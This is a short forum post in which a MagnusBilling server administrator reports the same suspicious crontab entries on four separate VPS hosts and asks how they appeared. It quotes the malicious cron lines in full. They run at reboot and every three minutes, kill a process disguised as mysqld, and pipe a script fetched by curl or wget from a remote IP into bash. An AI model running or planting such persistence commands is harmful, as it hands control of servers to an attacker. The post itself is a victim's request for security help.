some unusual activity in cronjob of magnus

[uzair329]

trafficstars

today i found this code in crontab of my all four different magnus located at different VPS and even different vendor with different domains . Can any one guess how is this possible so we can save our self for future security

@reboot /bin/sh -c "if ! pgrep -f '^mbilling --config=mbilling.conf$' &>/dev/null;then pkill -9 -f '^mysqld mysql.cnf$' >/dev/null 2>&1;(curl -sk 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf'||wget -qO- 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf')|(bash||sh);fi" */3 * * * * /bin/sh -c "if ! pgrep -f '^mbilling --config=mbilling.conf$' &>/dev/null;then pkill -9 -f '^mysqld mysql.cnf$' >/dev/null 2>&1;(curl -sk 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf'||wget -qO- 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf')|(bash||sh);fi"